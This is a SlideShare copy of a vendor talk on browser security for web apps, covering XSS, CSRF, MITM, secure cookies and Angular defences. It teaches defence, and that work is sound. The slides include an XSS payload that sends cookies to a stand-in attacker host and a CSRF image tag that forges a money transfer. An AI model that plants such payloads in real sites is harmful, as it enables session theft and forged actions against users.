SlideShare a Scribd company logo

Browser Security 101

Download as PPTX, PDF
Stormpath, profile picture
Stormpath

The document outlines key aspects of browser security, particularly for modern web applications, focusing on threats like XSS, CSRF, and MITM attacks. It discusses best practices for securing user credentials, sessions, and communication, along with the use of cookies and session identifiers. Additionally, it emphasizes the importance of utilizing frameworks and tools for effective security measures in application development.

Technology
Related topics:
API Security InsightsWeb Development
1 of 48
Downloaded 85 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Browser Security 101 Robert Damphousse Lead Front-End Developer, Stormpath @robertjd_
Welcome! • Agenda • Stormpath 101 (5 mins) • Browser Security 101 (40 mins) • Q&A (15 mins) • Robert Damphousse • Lead JS Engineer @ Stormpath • Full-stack for 10+ years • JS Full-stack since 2011
Stormpath 101
Speed to Market & Cost Reduction • Complete Identity solution out-of-the-box • Security best practices and updates by default • Clean & elegant API/SDKs • Little to code, no maintenance
Stormpath User Management User Data User Workflows Google ID Your Applications Application SDK Application SDK Application SDK ID Integrations Facebook Active Directory SAML
Browser Security 101
Browser Security 101 - Agenda • Security Concerns for Modern Web Apps • XSS • CSRF • MITM • Cookies, The Right Way • Angular Examples
Structure of Modern Web Apps • Back-end: a RESTful JSON API • Client is an HTML5 Environment: • Single Page Apps (“SPAs”), e.g. Angular, React • WebKit instance (“desktop” apps) • “Hybrid” Mobile apps (Phonegap, etc)
Security Concerns for Modern Web Apps • Secure user credentials (passwords) • Secure the user session • Secure communication with the server • Prevent malicious code from executing in the browser (XSS) • Prevent forged requests from un-trusted domains (CSRF)
The Traditional Solution: Session Identifiers
We accept username & password, then store a Session ID in a cookie and associate that session with the user.
Session ID Strategy
• This is OK if you secure the browser cookie • You need a web framework like Apache Shiro or Spring Security to assert security rules, and tie the session to the user (and their permissions) Session ID Strategy
Session ID Problems • They’re opaque and have no meaning themselves (they’re just ‘pointers’) • Session ID  User Permissions look-up *every request*, state bottleneck. • Cannot be used for inter-op with other services • JWTs can help with this, but they need to be stored securely in the browser.
Cookies, The Right Way ®
Cookies, The Right Way ® Cookies can be easily compromised • Man-in-the-Middle (MITM) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
Man In The Middle (MITM) Attack Someone ‘listening on the wire’ between the browser and server can see and copy the cookie. Solutions • Use HTTPS/TLS everywhere a cookie will be in transit • Set Secure flag on cookies
Cross-Site Scripting (XSS)
XSS Attacks This is a very REAL problem Happens when someone else can execute code inside your website Can be used to steal your cookies! https://www.owasp.org/index.php/XSS
XSS Attack Demo https://www.google.com/about/appsecurity/ learning/xss/#StoredXSS
XSS Attack Demo
XSS Attack Demo
XSS Attack Demo <img src=x onerror="document.body.appendChild(function (){var a = document.createElement('img'); a.src='https://hackmeplz.com/yourCookies.pn g/?cookies=’ +document.cookie;return a}())" So what if I put this in the chatbox..
XSS Attack Demo GET https://hackmeplz.com/yourCookies.png/?cook ies=SessionID=123412341234 Your browser is going to make this request: Which means..
Browser Security 101
XSS Attack – What Can I Do? Escape Content • Server-side: Use well-known, trusted libraries to ensure dynamic HTML does not contain executable code. Do NOT roll your own. • Client Side: Escape user input from forms (some frameworks do this automatically, read docs!)
XSS Attack – What Can I Do? Use HTTPS-Only cookies Set the HttpOnly flag on your authentication cookies. HttpOnly cookies are NOT accessible by the JavaScript environment
XSS Attack – What Can I Do? Read this definitive guide: https://www.owasp.org/index.php/XSS
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) Exploits the fact that HTML tags do NOT follow the Same Origin Policy when making GET requests https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF) https://developer.mozilla.org/en- US/docs/Web/Security/Same-origin_policy
Cross-Site Request Forgery (CSRF) Example: Attacker puts malicious image into a web page that the user visits: <img src=“https://myapp.com/transferMone y?to=BadGuy&amount=10000”/> .. what happens?
Cross-Site Request Forgery (CSRF) • The browser complies, “The request is going to myapp.com, so I’ll happily send along your cookies for myapp.com!” • Your server trusts the cookies AND the user it identifies, and transfers the money!
Cross-Site Request Forgery (CSRF) Solutions: • Synchronizer Token (for form-based apps) • Double-Submit Cookie (for modern apps) • Origin header check (for extra measure)
Double Submit Cookie • Give client two cookies: (1) Session ID and (2) a strong random value • Client sends back the random value in a custom HTTP header, triggering the Same- Origin-Policy
http://myapp.com/login Login Username Password yo@foo.com ••••••••••••••• Login WWW Server (1) POST /login (2) 200 OK Set-Cookie: session=dh7jWkx8fj; Set-Cookie: xsrf-token=xjk2kzjn4; http://myapp.com/profile Kitsch mustache seitan, meggings Portland VHS ethical ugh. Messenger bag pour-over deep v semiotics, Portland before they sold out small batch slow-carb PBR PBR&B chia synth vegan bitters Brooklyn. (3) GET /profile (4) 200 OK Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 X-XSRF-Token: xjk2kzjn4; Hello, Yo Cookie == Header ?
WWW Server http://hackerzapp.com/ req.setHeader(‘X-XSRF- Token’,’stolen token’) BROWSER ERROR No 'Access-Control-Allow- XSRF-Token’ header is present on the requested resource. GET http://myapp.com/profile http://hackerzapp.com/ <img src=“https:// yoursite.com/ transferMoney? to=BadGuy&amount=10000”/> (1) GET /transferMoney? (2) 400 Invalid Token Server rejects forged requests, CSRF token header is missing Browser rejects forged cross-domain AJAX attempts Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 Cookie == Header ?
CSRF: Referer Header Check • Tells you the URL of the page the user is on, when request is made. • Can be blank on first request if page is visited from a bookmark. • Not reliable, use as a secondary check.
CSRF: Origin Header Check • Tells your server which domain the request is coming from. • Cannot be modified by JavaScript • Not implemented in legacy browsers • Trust ONLY if connection is HTTPS (avoid malicious proxies). Use as a secondary check.
CORS Warning! BEWARE OF THIS ADVICE: Access-Control-Allow-Origin: * Access-Control-Allow-Headers:* DISABLES SAME-ORIGIN POLICY
Local Storage?
Local Storage vs. Cookies • Local Storage is XSS vulnerable • HttpOnly, Secure cookies are the only way to hide your session information from XSS attacks • Tradeoff: CSRF protection is essential! • Cookies automatic supply session information. • Local Storage requires custom HTTP Headers.
Angular Examples
Angular + XSS • DOES sanitize input from DOM bindings (ngBind) • Does NOT sanitize output through ngBindHtml • DON’T parse user input with $scope.eval() • Sever-side rendered templates MUST be evaluated for XSS injection
Angular + CSRF • Write your CSRF value to a cookie with the name: • Angular will automatically add this header to all requests: X-XSRF-Token: <value> XSRF-Token
Recap
• Cookies need to be secured! • XSS is real, and local storage is vulnerable. • CSRF protection is essential • HTTPS is required Recap
Thanks!
Use Stormpath for API Authentication & Security Our API and libraries give you a cloud-based user database and web application security in no time! Get started with your free Stormpath developer account: https://api.stormpath.com/register Questions? support@stormpath.com

More Related Content

PPTX
PPT on Phishing
Pankaj Yadav
 
PPT
Browser Security
Roberto Suggi Liverani
 
PPTX
Different Types of Phishing Attacks
SysCloud
 
PDF
Web Application Security and Awareness
Abdul Rahman Sherzad
 
PPTX
Phishing techniques
Sushil Kumar
 
PDF
What is Social Engineering? An illustrated presentation.
Pratum
 
PPT
Social Engineering | #ARMSec2015
Hovhannes Aghajanyan
 
PPT
Phishing attacks ppt
Aryan Ragu
 
PPT on Phishing
Pankaj Yadav
 
Browser Security
Roberto Suggi Liverani
 
Different Types of Phishing Attacks
SysCloud
 
Web Application Security and Awareness
Abdul Rahman Sherzad
 
Phishing techniques
Sushil Kumar
 
What is Social Engineering? An illustrated presentation.
Pratum
 
Social Engineering | #ARMSec2015
Hovhannes Aghajanyan
 
Phishing attacks ppt
Aryan Ragu
 

What's hot (20)

PPTX
Social media privacy and safety
Sarah K Miller
 
PPTX
Cybersecurity 2 cyber attacks
sommerville-videos
 
PPTX
Phishing ppt
shindept123
 
PDF
Cross Origin Resource Sharing
Luke Weerasooriya
 
PDF
Social engineering attacks
Ramiro Cid
 
PPTX
Phishing Presentation
Nikolaos Georgitsopoulos
 
PPTX
Phishing attack
Raghav Chhabra
 
PPTX
Social Engineering
primeteacher32
 
PDF
Introduction to HTML5
Gil Fink
 
PDF
Client-Side Penetration Testing Presentation
Chris Gates
 
PPTX
Man in-the-middle attack(http)
Togis UAB Ltd
 
PDF
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
ControlScan, Inc.
 
PDF
CNIT 129S: Ch 3: Web Application Technologies
Sam Bowne
 
PPTX
cybersecurity.pptx
20ArnavKumar8F
 
PPT
CYBER CRIME AND SECURITY
Sahil Vashishtha
 
PDF
End-User Security Awareness
Surya Bathulapalli
 
PPTX
cyber security presentation.pptx
kishore golla
 
PPTX
Phishing Awareness Training.pptx
Hajar Bouchriha
 
PPTX
Anti phishing
Shethwala Ridhvesh
 
PPTX
Cybercrime
Vansh Verma
 
Social media privacy and safety
Sarah K Miller
 
Cybersecurity 2 cyber attacks
sommerville-videos
 
Phishing ppt
shindept123
 
Cross Origin Resource Sharing
Luke Weerasooriya
 
Social engineering attacks
Ramiro Cid
 
Phishing Presentation
Nikolaos Georgitsopoulos
 
Phishing attack
Raghav Chhabra
 
Social Engineering
primeteacher32
 
Introduction to HTML5
Gil Fink
 
Client-Side Penetration Testing Presentation
Chris Gates
 
Man in-the-middle attack(http)
Togis UAB Ltd
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
ControlScan, Inc.
 
CNIT 129S: Ch 3: Web Application Technologies
Sam Bowne
 
cybersecurity.pptx
20ArnavKumar8F
 
CYBER CRIME AND SECURITY
Sahil Vashishtha
 
End-User Security Awareness
Surya Bathulapalli
 
cyber security presentation.pptx
kishore golla
 
Phishing Awareness Training.pptx
Hajar Bouchriha
 
Anti phishing
Shethwala Ridhvesh
 
Cybercrime
Vansh Verma
 
Ad

Viewers also liked (20)

PDF
Browser security — ROOTS
Andre N. Klingsheim
 
PDF
Securing Web Applications with Token Authentication
Stormpath
 
PDF
Web Browser Security - 2016 Comparative Test Results
NSS Labs
 
PDF
Building Beautiful REST APIs in ASP.NET Core
Stormpath
 
PPTX
Storing User Files with Express, Stormpath, and Amazon S3
Stormpath
 
PPTX
JWTs for CSRF and Microservices
Stormpath
 
PDF
Mobile Authentication for iOS Applications - Stormpath 101
Stormpath
 
PPTX
Token Authentication in ASP.NET Core
Stormpath
 
PPTX
Custom Data Search with Stormpath
Stormpath
 
PPTX
Spring Boot Authentication...and More!
Stormpath
 
PPTX
Stormpath 101: Spring Boot + Spring Security
Stormpath
 
PDF
JWTs in Java for CSRF and Microservices
Stormpath
 
PPTX
Instant Security & Scalable User Management with Spring Boot
Stormpath
 
PPTX
Multi-Tenancy with Spring Boot
Stormpath
 
PDF
The Ultimate Guide to Mobile API Security
Stormpath
 
PPTX
Beautiful REST+JSON APIs with Ion
Stormpath
 
PPTX
REST API Security: OAuth 2.0, JWTs, and More!
Stormpath
 
PPT
Web Security
Bharath Manoharan
 
PPT
Trusteer Rapport – Browser Security - How It Works
trusteer
 
PPTX
Secure API Services in Node with Basic Auth and OAuth2
Stormpath
 
Browser security — ROOTS
Andre N. Klingsheim
 
Securing Web Applications with Token Authentication
Stormpath
 
Web Browser Security - 2016 Comparative Test Results
NSS Labs
 
Building Beautiful REST APIs in ASP.NET Core
Stormpath
 
Storing User Files with Express, Stormpath, and Amazon S3
Stormpath
 
JWTs for CSRF and Microservices
Stormpath
 
Mobile Authentication for iOS Applications - Stormpath 101
Stormpath
 
Token Authentication in ASP.NET Core
Stormpath
 
Custom Data Search with Stormpath
Stormpath
 
Spring Boot Authentication...and More!
Stormpath
 
Stormpath 101: Spring Boot + Spring Security
Stormpath
 
JWTs in Java for CSRF and Microservices
Stormpath
 
Instant Security & Scalable User Management with Spring Boot
Stormpath
 
Multi-Tenancy with Spring Boot
Stormpath
 
The Ultimate Guide to Mobile API Security
Stormpath
 
Beautiful REST+JSON APIs with Ion
Stormpath
 
REST API Security: OAuth 2.0, JWTs, and More!
Stormpath
 
Web Security
Bharath Manoharan
 
Trusteer Rapport – Browser Security - How It Works
trusteer
 
Secure API Services in Node with Basic Auth and OAuth2
Stormpath
 
Ad

Similar to Browser Security 101 (20)

PPTX
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
PPTX
JWT Authentication with AngularJS
robertjd
 
PPTX
XSS (Cross Site Scripting)
Shubham Gupta
 
PPT
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
PPTX
Building Secure User Interfaces With JWTs
robertjd
 
PPTX
Html5 security
Krishna T
 
PPTX
Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy
subbul
 
PPTX
Open source security
lrigknat
 
PPTX
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 
PDF
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BSides Delhi
 
PPTX
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
PPTX
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
PDF
AOEconf17: Application Security
AOE
 
PDF
AOEconf17: Application Security - Bastian Ike
AOE
 
PDF
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
Sam Bowne
 
PDF
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
Sam Bowne
 
PDF
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Capgemini
 
PDF
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
PPTX
Cross Site Scripting: Prevention and Detection(XSS)
Aman Singh
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
JWT Authentication with AngularJS
robertjd
 
XSS (Cross Site Scripting)
Shubham Gupta
 
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
Building Secure User Interfaces With JWTs
robertjd
 
Html5 security
Krishna T
 
Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy
subbul
 
Open source security
lrigknat
 
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BSides Delhi
 
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
AOEconf17: Application Security
AOE
 
AOEconf17: Application Security - Bastian Ike
AOE
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
Sam Bowne
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
Sam Bowne
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Capgemini
 
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Cross Site Scripting: Prevention and Detection(XSS)
Aman Singh
 

More from Stormpath (13)

PDF
Getting Started With Angular
Stormpath
 
PDF
Building Beautiful REST APIs with ASP.NET Core
Stormpath
 
PDF
Build a REST API for your Mobile Apps using Node.js
Stormpath
 
PPTX
Token Authentication for Java Applications
Stormpath
 
PPTX
How to Use Stormpath in angular js
Stormpath
 
PPTX
Rest API Security
Stormpath
 
PPTX
Elegant Rest Design Webinar
Stormpath
 
PPTX
Secure Your REST API (The Right Way)
Stormpath
 
PPTX
Build a Node.js Client for Your REST+JSON API
Stormpath
 
PPTX
Build A Killer Client For Your REST+JSON API
Stormpath
 
PPTX
So long scrum, hello kanban
Stormpath
 
PPTX
REST API Design for JAX-RS And Jersey
Stormpath
 
PPTX
Design Beautiful REST + JSON APIs
Stormpath
 
Getting Started With Angular
Stormpath
 
Building Beautiful REST APIs with ASP.NET Core
Stormpath
 
Build a REST API for your Mobile Apps using Node.js
Stormpath
 
Token Authentication for Java Applications
Stormpath
 
How to Use Stormpath in angular js
Stormpath
 
Rest API Security
Stormpath
 
Elegant Rest Design Webinar
Stormpath
 
Secure Your REST API (The Right Way)
Stormpath
 
Build a Node.js Client for Your REST+JSON API
Stormpath
 
Build A Killer Client For Your REST+JSON API
Stormpath
 
So long scrum, hello kanban
Stormpath
 
REST API Design for JAX-RS And Jersey
Stormpath
 
Design Beautiful REST + JSON APIs
Stormpath
 

Recently uploaded (20)

PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
A Presentation on Artificial Intelligence
memembruh336
 
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Cloud computing and distributed systems.
kkkkkhan
 
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
KodekX | Application Modernization Development
KodekX
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 

Browser Security 101

  • 1. Browser Security 101 Robert Damphousse Lead Front-End Developer, Stormpath @robertjd_
  • 2. Welcome! • Agenda • Stormpath 101 (5 mins) • Browser Security 101 (40 mins) • Q&A (15 mins) • Robert Damphousse • Lead JS Engineer @ Stormpath • Full-stack for 10+ years • JS Full-stack since 2011
  • 4. Speed to Market & Cost Reduction • Complete Identity solution out-of-the-box • Security best practices and updates by default • Clean & elegant API/SDKs • Little to code, no maintenance
  • 5. Stormpath User Management User Data User Workflows Google ID Your Applications Application SDK Application SDK Application SDK ID Integrations Facebook Active Directory SAML
  • 7. Browser Security 101 - Agenda • Security Concerns for Modern Web Apps • XSS • CSRF • MITM • Cookies, The Right Way • Angular Examples
  • 8. Structure of Modern Web Apps • Back-end: a RESTful JSON API • Client is an HTML5 Environment: • Single Page Apps (“SPAs”), e.g. Angular, React • WebKit instance (“desktop” apps) • “Hybrid” Mobile apps (Phonegap, etc)
  • 9. Security Concerns for Modern Web Apps • Secure user credentials (passwords) • Secure the user session • Secure communication with the server • Prevent malicious code from executing in the browser (XSS) • Prevent forged requests from un-trusted domains (CSRF)
  • 11. We accept username & password, then store a Session ID in a cookie and associate that session with the user.
  • 13. • This is OK if you secure the browser cookie • You need a web framework like Apache Shiro or Spring Security to assert security rules, and tie the session to the user (and their permissions) Session ID Strategy
  • 14. Session ID Problems • They’re opaque and have no meaning themselves (they’re just ‘pointers’) • Session ID  User Permissions look-up *every request*, state bottleneck. • Cannot be used for inter-op with other services • JWTs can help with this, but they need to be stored securely in the browser.
  • 16. Cookies, The Right Way ® Cookies can be easily compromised • Man-in-the-Middle (MITM) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
  • 17. Man In The Middle (MITM) Attack Someone ‘listening on the wire’ between the browser and server can see and copy the cookie. Solutions • Use HTTPS/TLS everywhere a cookie will be in transit • Set Secure flag on cookies
  • 19. XSS Attacks This is a very REAL problem Happens when someone else can execute code inside your website Can be used to steal your cookies! https://www.owasp.org/index.php/XSS
  • 23. XSS Attack Demo <img src=x onerror="document.body.appendChild(function (){var a = document.createElement('img'); a.src='https://hackmeplz.com/yourCookies.pn g/?cookies=’ +document.cookie;return a}())" So what if I put this in the chatbox..
  • 26. XSS Attack – What Can I Do? Escape Content • Server-side: Use well-known, trusted libraries to ensure dynamic HTML does not contain executable code. Do NOT roll your own. • Client Side: Escape user input from forms (some frameworks do this automatically, read docs!)
  • 27. XSS Attack – What Can I Do? Use HTTPS-Only cookies Set the HttpOnly flag on your authentication cookies. HttpOnly cookies are NOT accessible by the JavaScript environment
  • 28. XSS Attack – What Can I Do? Read this definitive guide: https://www.owasp.org/index.php/XSS
  • 30. Cross-Site Request Forgery (CSRF) Exploits the fact that HTML tags do NOT follow the Same Origin Policy when making GET requests https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF) https://developer.mozilla.org/en- US/docs/Web/Security/Same-origin_policy
  • 31. Cross-Site Request Forgery (CSRF) Example: Attacker puts malicious image into a web page that the user visits: <img src=“https://myapp.com/transferMone y?to=BadGuy&amount=10000”/> .. what happens?
  • 32. Cross-Site Request Forgery (CSRF) • The browser complies, “The request is going to myapp.com, so I’ll happily send along your cookies for myapp.com!” • Your server trusts the cookies AND the user it identifies, and transfers the money!
  • 33. Cross-Site Request Forgery (CSRF) Solutions: • Synchronizer Token (for form-based apps) • Double-Submit Cookie (for modern apps) • Origin header check (for extra measure)
  • 34. Double Submit Cookie • Give client two cookies: (1) Session ID and (2) a strong random value • Client sends back the random value in a custom HTTP header, triggering the Same- Origin-Policy
  • 35. http://myapp.com/login Login Username Password yo@foo.com ••••••••••••••• Login WWW Server (1) POST /login (2) 200 OK Set-Cookie: session=dh7jWkx8fj; Set-Cookie: xsrf-token=xjk2kzjn4; http://myapp.com/profile Kitsch mustache seitan, meggings Portland VHS ethical ugh. Messenger bag pour-over deep v semiotics, Portland before they sold out small batch slow-carb PBR PBR&B chia synth vegan bitters Brooklyn. (3) GET /profile (4) 200 OK Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 X-XSRF-Token: xjk2kzjn4; Hello, Yo Cookie == Header ?
  • 36. WWW Server http://hackerzapp.com/ req.setHeader(‘X-XSRF- Token’,’stolen token’) BROWSER ERROR No 'Access-Control-Allow- XSRF-Token’ header is present on the requested resource. GET http://myapp.com/profile http://hackerzapp.com/ <img src=“https:// yoursite.com/ transferMoney? to=BadGuy&amount=10000”/> (1) GET /transferMoney? (2) 400 Invalid Token Server rejects forged requests, CSRF token header is missing Browser rejects forged cross-domain AJAX attempts Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 Cookie == Header ?
  • 37. CSRF: Referer Header Check • Tells you the URL of the page the user is on, when request is made. • Can be blank on first request if page is visited from a bookmark. • Not reliable, use as a secondary check.
  • 38. CSRF: Origin Header Check • Tells your server which domain the request is coming from. • Cannot be modified by JavaScript • Not implemented in legacy browsers • Trust ONLY if connection is HTTPS (avoid malicious proxies). Use as a secondary check.
  • 39. CORS Warning! BEWARE OF THIS ADVICE: Access-Control-Allow-Origin: * Access-Control-Allow-Headers:* DISABLES SAME-ORIGIN POLICY
  • 41. Local Storage vs. Cookies • Local Storage is XSS vulnerable • HttpOnly, Secure cookies are the only way to hide your session information from XSS attacks • Tradeoff: CSRF protection is essential! • Cookies automatic supply session information. • Local Storage requires custom HTTP Headers.
  • 43. Angular + XSS • DOES sanitize input from DOM bindings (ngBind) • Does NOT sanitize output through ngBindHtml • DON’T parse user input with $scope.eval() • Sever-side rendered templates MUST be evaluated for XSS injection
  • 44. Angular + CSRF • Write your CSRF value to a cookie with the name: • Angular will automatically add this header to all requests: X-XSRF-Token: <value> XSRF-Token
  • 45. Recap
  • 46. • Cookies need to be secured! • XSS is real, and local storage is vulnerable. • CSRF protection is essential • HTTPS is required Recap
  • 48. Use Stormpath for API Authentication & Security Our API and libraries give you a cloud-based user database and web application security in no time! Get started with your free Stormpath developer account: https://api.stormpath.com/register Questions? support@stormpath.com